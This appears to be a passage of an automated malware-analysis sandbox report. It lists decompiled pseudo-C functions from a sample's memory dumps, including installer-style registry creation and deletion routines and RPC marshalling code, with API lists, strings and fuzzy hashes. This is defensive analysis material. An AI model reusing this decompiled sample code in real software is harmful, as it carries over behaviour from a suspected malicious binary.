                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p)$conformance = %ld$invalid format type %x$variance = %d
                                                                                                • API String ID: 3997070919-1898606334
                                                                                                • Opcode ID: 41c41b085873cab84509345c1e8070ad612cd23c86ac5cc8473d5571e51a431e
                                                                                                • Instruction ID: c483dbdeb12111feef4301ac8c71042c0c0623170e3beca34bbcc816b4ac6f86
                                                                                                • Opcode Fuzzy Hash: 41c41b085873cab84509345c1e8070ad612cd23c86ac5cc8473d5571e51a431e
                                                                                                • Instruction Fuzzy Hash: ED3110B5A00109AFDB04DF98D890EAE77B9BB48344F00C558FA198B345E731EA51CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA6600, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 30%
                                                                                                			E6EDA6600(intOrPtr _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t73;
				void* _t75;

				0x6eda0000("(pStubMsg == ^%p, pFormat == ^%p)\n", _a4, _a8);
				_v12 =  *(_a8 + (1 << 1)) & 0x0000ffff;
				E6EDAA540( *(_a8 + (1 << 1)) & 0x0000ffff, _a4, 0, _v12);
				_t75 = _t73 + 0x18;
				if( *((intOrPtr*)(_a4 + 0x40)) != 0) {
					0x6eda0000("non-conformant strings can\'t have Offset (%d)\n",  *((intOrPtr*)(_a4 + 0x40)));
					_t75 = _t75 + 8;
					__imp__RpcRaiseException(0x6c6);
				}
				if(( *_a8 & 0x000000ff) != 0x26) {
					if(( *_a8 & 0x000000ff) != 0x29) {
						0x6eda0000("Unhandled string type: %#x\n",  *_a8 & 0x000000ff);
						_t75 = _t75 + 8;
						__imp__RpcRaiseException(0x6f7);
					} else {
						_v8 = 2;
					}
				} else {
					_v8 = 1;
				}
				_v20 = _v8 * _v12;
				_v16 = E6EDAAEC0(_v8,  *((intOrPtr*)(_a4 + 0x44)));
				E6EDAB0C0(_a4, _a4, _v16, _v8);
				E6EDAAF00(_a4, _v16);
				 *((intOrPtr*)(_a4 + 0x18)) =  *((intOrPtr*)(_a4 + 0x18)) + _v20;
				return  *((intOrPtr*)(_a4 + 0x18));
			}









                                                                                                0x6eda6613
                                                                                                0x6eda6629
                                                                                                0x6eda6636
                                                                                                0x6eda663b
                                                                                                0x6eda6645
                                                                                                0x6eda6653
                                                                                                0x6eda6658
                                                                                                0x6eda6660
                                                                                                0x6eda6660
                                                                                                0x6eda666f
                                                                                                0x6eda6683
                                                                                                0x6eda669a
                                                                                                0x6eda669f
                                                                                                0x6eda66a7
                                                                                                0x6eda6685
                                                                                                0x6eda6685
                                                                                                0x6eda6685
                                                                                                0x6eda6671
                                                                                                0x6eda6671
                                                                                                0x6eda6671
                                                                                                0x6eda66b4
                                                                                                0x6eda66ca
                                                                                                0x6eda66d9
                                                                                                0x6eda66e9
                                                                                                0x6eda66fd
                                                                                                0x6eda6709

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA6660
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA66A7
                                                                                                Strings
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA6695
                                                                                                • (pStubMsg == ^%p, pFormat == ^%p), xrefs: 6EDA660E
                                                                                                • non-conformant strings can't have Offset (%d), xrefs: 6EDA664E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (pStubMsg == ^%p, pFormat == ^%p)$Unhandled string type: %#x$non-conformant strings can't have Offset (%d)
                                                                                                • API String ID: 3997070919-3730632230
                                                                                                • Opcode ID: a5dae440ecf49078ef8489c5b90378dfcee0ad9607f20499e0027705d4318d7b
                                                                                                • Instruction ID: 0e9965502e440e68a26e1106838e6fa2f4f3742fa5fa5a69662d4ff3ef231929
                                                                                                • Opcode Fuzzy Hash: a5dae440ecf49078ef8489c5b90378dfcee0ad9607f20499e0027705d4318d7b
                                                                                                • Instruction Fuzzy Hash: 95312FB5A00108EFCB04DF98D8909AD7B79EF99344F108199FA594B345E731EB51CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004022F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 85%
                                                                                                			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t30 =  *0x42ec10; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a378) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a378 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E44( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a378, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a378, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *(_t37 - 4);
				return 0;
			}











                                                                                                0x004022f6
                                                                                                0x004022fb
                                                                                                0x00402305
                                                                                                0x0040230f
                                                                                                0x00402312
                                                                                                0x0040231c
                                                                                                0x0040232c
                                                                                                0x00402333
                                                                                                0x0040233b
                                                                                                0x00402349
                                                                                                0x0040234d
                                                                                                0x00402358
                                                                                                0x00402358
                                                                                                0x0040235c
                                                                                                0x00402360
                                                                                                0x00402366
                                                                                                0x0040236b
                                                                                                0x0040236b
                                                                                                0x0040236f
                                                                                                0x0040237b
                                                                                                0x0040237b
                                                                                                0x00402394
                                                                                                0x00402396
                                                                                                0x00402396
                                                                                                0x00402399
                                                                                                0x0040246f
                                                                                                0x0040246f
                                                                                                0x00402880
                                                                                                0x0040288c

                                                                                                APIs
                                                                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nszE2AE.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                                                                                                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nszE2AE.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nszE2AE.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nszE2AE.tmp
                                                                                                • API String ID: 1356686001-927828151
                                                                                                • Opcode ID: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                                                                                • Instruction ID: 68e10371c4729356781e9985955bb9a28b8d5e30648407f5ab20691da4643e4d
                                                                                                • Opcode Fuzzy Hash: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                                                                                • Instruction Fuzzy Hash: 1B1172B1E00208BFEB10ABA5DE4EEAF767CEB00758F10443AF505B71D0D7B89D419A69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00402A28, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 84%
                                                                                                			E00402A28(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ec10; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A28(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405C49(2);
					if(_t27 == 0) {
						__eflags =  *0x42ec10; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ec10, 0);
				}
				return _t18;
			}










                                                                                                0x00402a38
                                                                                                0x00402a49
                                                                                                0x00402a51
                                                                                                0x00402a79
                                                                                                0x00402a60
                                                                                                0x00402a63
                                                                                                0x00402ab3
                                                                                                0x00402ab9
                                                                                                0x00402abb
                                                                                                0x00000000
                                                                                                0x00402abb
                                                                                                0x00402a70
                                                                                                0x00402a75
                                                                                                0x00402a77
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402a77
                                                                                                0x00402a8e
                                                                                                0x00402a96
                                                                                                0x00402a9d
                                                                                                0x00402ac3
                                                                                                0x00402ac9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402ad1
                                                                                                0x00402ad7
                                                                                                0x00402ad9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402ad9
                                                                                                0x00000000
                                                                                                0x00402aac
                                                                                                0x00402ac0

                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                • String ID:
                                                                                                • API String ID: 1912718029-0
                                                                                                • Opcode ID: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                                                                                • Instruction ID: 9b693693afe27744eb74945a5ab88af436457a169b5d028682666f5dd4735d18
                                                                                                • Opcode Fuzzy Hash: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                                                                                • Instruction Fuzzy Hash: 07119A31600109FFDF21AF91DE49DAB3B2DEB40394B00453AFA01B10A0DBB59E41EF69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                0x00401ccb
                                                                                                0x00401cd2
                                                                                                0x00401d01
                                                                                                0x00401d09
                                                                                                0x00401d10
                                                                                                0x00401d10
                                                                                                0x00402880
                                                                                                0x0040288c

                                                                                                APIs
                                                                                                • GetDlgItem.USER32 ref: 00401CC5
                                                                                                • GetClientRect.USER32 ref: 00401CD2
                                                                                                • LoadImageA.USER32 ref: 00401CF3
                                                                                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                • String ID:
                                                                                                • API String ID: 1849352358-0
                                                                                                • Opcode ID: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                                                                                • Instruction ID: 5b52a60f850666e7e12d56efb71538ab26ca797e9f055acb3b10a0d9f88dae52
                                                                                                • Opcode Fuzzy Hash: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                                                                                • Instruction Fuzzy Hash: 26F0FFB2A04105BFD700EBA4EE89DAF77BDEB44341B104476F601F6190C7749D018B29
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA3AA0, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 201COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 72%
                                                                                                			E6EDA3AA0(signed int _a4, intOrPtr* _a8, signed short* _a12, signed int _a16) {
				signed char* _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t116;
				char _t125;
				intOrPtr _t137;
				intOrPtr _t140;
				void* _t152;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t221;

				_v12 = _a12[1] & 0x0000ffff;
				_v8 = 0;
				_v24 = 0;
				_v44 = 0;
				_v32 = 0;
				_v28 = 0;
				_v36 = 0;
				_v16 = 0;
				0x6eda0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t219 = _t218 + 0x14;
				_t116 = _a4;
				_t223 =  *((intOrPtr*)(_t116 + 0x34));
				if( *((intOrPtr*)(_t116 + 0x34)) == 0) {
					_v48 =  *((intOrPtr*)(_a4 + 0x30));
					_v20 =  *((intOrPtr*)(_a4 + 4));
					 *((intOrPtr*)(_a4 + 0x30)) = 1;
					E6EDA5F90(_t223, _a4, _a12);
					 *((intOrPtr*)(_a4 + 0x30)) = _v48;
					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
					0x6eda0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x34)) - _v20);
					_t219 = _t219 + 8;
					_v44 = 1;
					 *((intOrPtr*)(_a4 + 4)) = _v20;
				}
				E6EDA73D0(( *(_a12 + (1 << 0)) & 0x000000ff) + 1, _a4 + 4, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
				_t220 = _t219 + 8;
				_a12 =  &(_a12[2]);
				if( *_a12 != 0) {
					_v8 = _a12 +  *_a12;
				}
				_a12 =  &(_a12[1]);
				if(( *_a12 & 0x0000ffff) != 0) {
					_v24 = _a12 + ( *_a12 & 0x0000ffff);
				}
				_a12 =  &(_a12[1]);
				if(_v8 != 0) {
					_t140 = E6EDAD650( *_v8 & 0x000000ff, _a4, _v8);
					_t220 = _t220 + 0xc;
					_v16 = _t140;
					_v12 = _v12 + _v16;
					_v28 =  *((intOrPtr*)(_a4 + 0x3c));
					_v32 =  *((intOrPtr*)(_a4 + 0x44));
					_v36 =  *((intOrPtr*)(_a4 + 0x40));
				}
				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
					_a16 = 1;
				}
				if((_a16 & 0x000000ff) != 0) {
					_t137 = E6EDAA3B0(_a4, _a4, _v12);
					_t220 = _t220 + 8;
					 *_a8 = _t137;
				}
				_t125 = E6EDA9560(_a4,  *_a8, _a12, _v24, _a16 & 0x000000ff);
				_t221 = _t220 + 0x14;
				_v40 = _t125;
				if(_v8 != 0) {
					 *((intOrPtr*)(_a4 + 0x3c)) = _v28;
					 *((intOrPtr*)(_a4 + 0x44)) = _v32;
					 *((intOrPtr*)(_a4 + 0x40)) = _v36;
					if((_a16 & 0x000000ff) != 0) {
						E6EDB0770(_v40, 0, _v16);
						_t221 = _t221 + 0xc;
					}
					E6EDAD830(_t152, _t216, _t217,  *_v8 & 0x000000ff, _a4,  &_v40, _v8, 0, 0, 1);
				}
				if(_v44 != 0) {
					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
					 *((intOrPtr*)(_a4 + 0x34)) = 0;
				}
				return 0;
			}

























                                                                                                0x6eda3aad
                                                                                                0x6eda3ab0
                                                                                                0x6eda3ab7
                                                                                                0x6eda3abe
                                                                                                0x6eda3ac5
                                                                                                0x6eda3acc
                                                                                                0x6eda3ad3
                                                                                                0x6eda3ada
                                                                                                0x6eda3af7
                                                                                                0x6eda3afc
                                                                                                0x6eda3aff
                                                                                                0x6eda3b02
                                                                                                0x6eda3b06
                                                                                                0x6eda3b0e
                                                                                                0x6eda3b17
                                                                                                0x6eda3b1d
                                                                                                0x6eda3b2c
                                                                                                0x6eda3b37
                                                                                                0x6eda3b43
                                                                                                0x6eda3b55
                                                                                                0x6eda3b5a
                                                                                                0x6eda3b5d
                                                                                                0x6eda3b6a
                                                                                                0x6eda3b6a
                                                                                                0x6eda3b87
                                                                                                0x6eda3b8c
                                                                                                0x6eda3b95
                                                                                                0x6eda3ba0
                                                                                                0x6eda3bab
                                                                                                0x6eda3bab
                                                                                                0x6eda3bb4
                                                                                                0x6eda3bbf
                                                                                                0x6eda3bca
                                                                                                0x6eda3bca
                                                                                                0x6eda3bd3
                                                                                                0x6eda3bda
                                                                                                0x6eda3bf4
                                                                                                0x6eda3bf9
                                                                                                0x6eda3bfc
                                                                                                0x6eda3c05
                                                                                                0x6eda3c0e
                                                                                                0x6eda3c17
                                                                                                0x6eda3c20
                                                                                                0x6eda3c20
                                                                                                0x6eda3c29
                                                                                                0x6eda3c33
                                                                                                0x6eda3c33
                                                                                                0x6eda3c3d
                                                                                                0x6eda3c47
                                                                                                0x6eda3c4c
                                                                                                0x6eda3c52
                                                                                                0x6eda3c52
                                                                                                0x6eda3c6b
                                                                                                0x6eda3c70
                                                                                                0x6eda3c73
                                                                                                0x6eda3c7a
                                                                                                0x6eda3c82
                                                                                                0x6eda3c8b
                                                                                                0x6eda3c94
                                                                                                0x6eda3c9d
                                                                                                0x6eda3ca9
                                                                                                0x6eda3cae
                                                                                                0x6eda3cae
                                                                                                0x6eda3cd3
                                                                                                0x6eda3cd8
                                                                                                0x6eda3cdf
                                                                                                0x6eda3cea
                                                                                                0x6eda3cf0
                                                                                                0x6eda3cf0
                                                                                                0x6eda3cfc

                                                                                                APIs
                                                                                                • _NdrComplexStructMemorySize@8.SOZZ(?,?), ref: 6EDA3B2C
                                                                                                • _memset.LIBCMT ref: 6EDA3CA9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ComplexMemorySize@8Struct_memset
                                                                                                • String ID: (%p,%p,%p,%d)$difference = 0x%x
                                                                                                • API String ID: 4515687-1755659387
                                                                                                • Opcode ID: 424731866f9ca5aa2fcd4905e701aa0e25e7ff07aaf446757c02c28646084193
                                                                                                • Instruction ID: bff2ea26c40e7e01cc88d8dc3c70c0891e731825e7bc259c4c77226aadb665ba
                                                                                                • Opcode Fuzzy Hash: 424731866f9ca5aa2fcd4905e701aa0e25e7ff07aaf446757c02c28646084193
                                                                                                • Instruction Fuzzy Hash: A5910BB4A00249EFDB44CF98C890BEEBBB5BF48304F148559F9199B341D375EA51CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA3FC0, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 172COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 62%
                                                                                                			E6EDA3FC0(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t96;
				intOrPtr _t110;
				void* _t171;
				void* _t172;
				void* _t175;

				0x6eda0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t172 = _t171 + 0x14;
				if(( *_a12 & 0x000000ff) == 0x1f || ( *_a12 & 0x000000ff) == 0x20) {
					_v5 = (_a12[1] & 0x000000ff) + 1;
					if(( *_a12 & 0x000000ff) != 0x1f) {
						_a12 =  &(_a12[2]);
						_v16 =  *_a12;
						_a12 =  &(_a12[4]);
						_v12 =  *_a12;
						_a12 =  &(_a12[4]);
					} else {
						_a12 =  &(_a12[2]);
						_v16 =  *_a12 & 0x0000ffff;
						_a12 =  &(_a12[2]);
						_v12 =  *_a12 & 0x0000ffff;
						_a12 =  &(_a12[2]);
					}
					_v28 =  *_a12 & 0x0000ffff;
					_a12 =  &(_a12[2]);
					_a12 = E6EDAA540(_v12, _a4, _a12, _v12);
					E6EDA73D0(_v5 & 0x000000ff, _a4 + 4, _v5 & 0x000000ff);
					_t96 = E6EDAAEC0(_v28,  *((intOrPtr*)(_a4 + 0x44)));
					_t175 = _t172 + 0x1c;
					_v20 = _t96;
					_v32 =  *((intOrPtr*)(_a4 + 0x40));
					if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
						_a16 = 1;
					}
					_t132 = _a16 & 0x000000ff;
					if((_a16 & 0x000000ff) != 0) {
						_t110 = E6EDAA3B0(_t132, _a4, _v16);
						_t175 = _t175 + 8;
						 *_a8 = _t110;
					}
					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
					_v24 =  *((intOrPtr*)(_a4 + 0x10));
					E6EDAAF00(_a4, _v20);
					E6EDAC2B0(_a4, _v24,  *_a8, _a12, _a16 & 0x000000ff);
					E6EDB0120( *_a8 + _v32, _v24, _v20);
					return 0;
				} else {
					0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
					__imp__RpcRaiseException(0x6e6);
					return 0;
				}
			}















                                                                                                0x6eda3fdc
                                                                                                0x6eda3fe1
                                                                                                0x6eda3ff6
                                                                                                0x6eda404d
                                                                                                0x6eda4062
                                                                                                0x6eda4099
                                                                                                0x6eda40a1
                                                                                                0x6eda40aa
                                                                                                0x6eda40b2
                                                                                                0x6eda40bb
                                                                                                0x6eda4064
                                                                                                0x6eda406a
                                                                                                0x6eda4073
                                                                                                0x6eda407c
                                                                                                0x6eda4085
                                                                                                0x6eda408e
                                                                                                0x6eda408e
                                                                                                0x6eda40c4
                                                                                                0x6eda40cd
                                                                                                0x6eda40e4
                                                                                                0x6eda40f3
                                                                                                0x6eda4106
                                                                                                0x6eda410b
                                                                                                0x6eda410e
                                                                                                0x6eda4117
                                                                                                0x6eda4120
                                                                                                0x6eda412a
                                                                                                0x6eda412a
                                                                                                0x6eda412e
                                                                                                0x6eda4134
                                                                                                0x6eda413e
                                                                                                0x6eda4143
                                                                                                0x6eda4149
                                                                                                0x6eda4149
                                                                                                0x6eda4154
                                                                                                0x6eda415d
                                                                                                0x6eda4168
                                                                                                0x6eda4187
                                                                                                0x6eda41a0
                                                                                                0x00000000
                                                                                                0x6eda400c
                                                                                                0x6eda4021
                                                                                                0x6eda402e
                                                                                                0x00000000
                                                                                                0x6eda4034

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memmove
                                                                                                • String ID: (%p, %p, %p, %d)$invalid format type %x
                                                                                                • API String ID: 4056999889-658257468
                                                                                                • Opcode ID: 91cd96b2e87b3aa135b9e31be7796a5a7b901dbb334babd7364af7e587717094
                                                                                                • Instruction ID: 6929ec0f5c5266864426566b3b906d1a7123bc7357aa5918ac26da03e7caf6f7
                                                                                                • Opcode Fuzzy Hash: 91cd96b2e87b3aa135b9e31be7796a5a7b901dbb334babd7364af7e587717094
                                                                                                • Instruction Fuzzy Hash: 556173B5A0424A9FCB04CF98C8909AF7BB6FF89304F048559F9558B345D730EA61CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAA22F, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 159COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDAA32D
                                                                                                • RpcRaiseException.RPCRT4(0000000E), ref: 6EDAA34A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
